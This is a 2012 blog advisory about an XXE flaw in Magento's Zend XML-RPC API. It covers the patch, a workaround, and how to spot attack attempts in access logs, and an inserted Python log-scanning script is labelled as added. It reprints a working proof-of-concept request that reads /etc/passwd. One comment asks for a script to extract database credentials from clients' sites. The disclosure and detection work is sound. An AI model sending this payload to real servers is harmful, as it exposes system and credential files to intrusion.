Friday, July 6, 2012

Magento / Zend Framework Vulnerability


There is a serious vulnerability in the Zend Framework, which Magento relies on heavily. For those of you not familiar with Magento, it is an e-commerce platform available as both an Open Source (Community) edition and an Enterprise edition. Anyone exposing Magento's XML-RPC API is vulnerable to the XXE issue in the Zend XML-RPC package.

Magento has released a bulletin (http://www.magentocommerce.com/blog/comments/important-security-update-zend-platform-vulnerability) advising all of its users to apply a patch that Magento released yesterday, 10 days after Zend shipped the fix in Zend Framework 1.11.12 (http://devzone.zend.com/2397/zend-framework-1-11-12-released/).

Why am I writing about a disclosure that is 11 days old? Magento is a heavily used product, and those running it may not be aware that an official patch was released by the company yesterday. I also believe we should freely share what is found and help users out there mitigate the risks.

Disclosure:

Credit for discovering the vulnerability goes to Johannes Greil and Kestutis Gudinavicius of SEC Consult Vulnerability Lab.

Proof of Concept:
Credit: SEC Consult Vulnerability Lab, https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt

Magento:

POST /index.php/api/xmlrpc HTTP/1.1
Host: $host

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
  <methodName>&xxe;</methodName>
</methodCall>


[Screenshot: the same request sent from SoapUI]


As shown above, I was able to retrieve the "/etc/passwd" file from the system with a single call to the XML-RPC API on Magento.

Solution:

Patch your systems immediately!!!

Magento has made the patches available (see the link above) in the solution section of its bulletin for both the Community and Enterprise Editions as of yesterday. You can apply them live with little impact to your site. If you are using a cache, make sure to flush it, or restart your Apache server.

How do I know if I have already fallen victim to this vulnerability?
This will be tough to tell. If you do not use the Magento XML-RPC API, any POST request to the API endpoint in your access logs is suspicious; look for entries like the one below:


192.168.23.1 - - [06/Jul/2012:16:25:52 -0400] "POST /index.php/api/xmlrpc HTTP/1.1" 200 722 "-" "Jakarta Commons-HttpClient/3.1"
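To make that log check repeatable, here is an added Python script (not from the post, Magento or Zend) that parses Apache combined-format access log lines, flags POST requests to the XML-RPC endpoint and counts them by source address and user agent. The sample lines other than the one quoted above are constructed.

```python
import re
from collections import Counter

# Apache combined log format, matching the sample line quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# The Magento XML-RPC endpoint named in the bulletin. A trailing slash or a
# query string is tolerated so trivially different spellings are not missed.
XMLRPC_PATH_RE = re.compile(r'^/index\.php/api/xmlrpc/?(?:\?.*)?$', re.IGNORECASE)


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_xmlrpc_post(entry):
    """True for a POST to the XML-RPC endpoint; GETs and other paths are ignored."""
    return (entry is not None and entry["method"] == "POST"
            and XMLRPC_PATH_RE.match(entry["path"]) is not None)


def scan_access_log(lines):
    """Return the matching entries plus per-IP and per-User-Agent counts."""
    hits = [e for e in map(parse_line, lines) if is_xmlrpc_post(e)]
    by_ip = Counter(e["ip"] for e in hits)
    by_ua = Counter(e["ua"] or "-" for e in hits)
    return hits, by_ip, by_ua


# Constructed sample: line 1 is the post's own example, the others are made up.
SAMPLE_LOG = [
    '192.168.23.1 - - [06/Jul/2012:16:25:52 -0400] "POST /index.php/api/xmlrpc HTTP/1.1" 200 722 "-" "Jakarta Commons-HttpClient/3.1"',
    '10.0.0.5 - - [06/Jul/2012:16:26:10 -0400] "GET /index.php/api/xmlrpc HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [06/Jul/2012:16:27:01 -0400] "POST /index.php/api/xmlrpc/ HTTP/1.1" 200 900 "-" "Python-urllib/2.7"',
    '10.0.0.9 - - [06/Jul/2012:16:28:00 -0400] "POST /index.php/checkout/cart/add/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits, by_ip, by_ua = scan_access_log(SAMPLE_LOG)
    for e in hits:
        print(e["ts"], e["ip"], e["status"], e["size"], e["ua"])
    print("by source IP:", dict(by_ip))
    print("by user agent:", dict(by_ua))
```

Run it over a real log with `scan_access_log(open("access.log"))`; any hit on a site that does not use the API is worth investigating.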

What if I cannot patch this right now and want to protect myself, even though I am not using the Magento XML-RPC API?

You have two options: follow Magento's workaround below, or block the endpoint at the web server (the optional workaround further down).

Workaround (taken from the Magento blog post)

If the patch cannot be applied immediately, the following instructions can be followed to temporarily disable the RPC functionality that contains the vulnerability. Please be advised, any integrations that rely on the XMLRPC API functionality will no longer work after this workaround is implemented.
  1. On the Magento web server, navigate to the www-root where Magento app files are stored.
  2. In the wwwroot, navigate to /app/code/core/Mage/Api/controllers.
  3. Open XmlrpcController.php for editing.
  4. Comment out or delete the body of the method: public indexAction()
  5. Save the changes.

Optional Workaround
Deny access to the XML-RPC API URI at the web server, either with Apache (a RewriteRule or a LocationMatch block) or, if you run ModSecurity, with a rule there.

URI: /index.php/api/xmlrpc

References:
http://devzone.zend.com/2397/zend-framework-1-11-12-released/
http://www.magentocommerce.com/blog/comments/important-security-update-zend-platform-vulnerability
https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt

Special thanks to @thronic for bringing this vulnerability to my attention today; a great PHP developer if you are looking for one.

6 comments:

  1. Hi,

     What about the config information, is it possible to see it using this exploit? If yes, please tell us how to test it here.

     Reply:
     1. Are you asking for a script to be able to test this against your site?

  2. Yes, if there is any script, I want to test my website and my clients' websites too (show the config: host & database name & username & password ..). Thanks for your help.

  3. I think this article is a lot more relevant in these times. With companies looking to advertise through the most cost effective mediums - Magento certified developers Adelaide

  4. Great read! I am impressed by how you make your article easy to understand. I'll come back for more :D

     Japs Buidon is a Social Media Specialist and SEO from a renowned Magento Development Company in Florida. He loves hiking as well as electronics.

  5. Yes, I also faced the problem of the Magento vulnerability; I had to put in a patch for better protection. I have been working on the Magento platform relatively recently, but I've already discovered some problems. It is not the first time a template has been designed for the Magento system; many colleagues also complained about the same problems.

 
© Bruce Martins
All rights reserved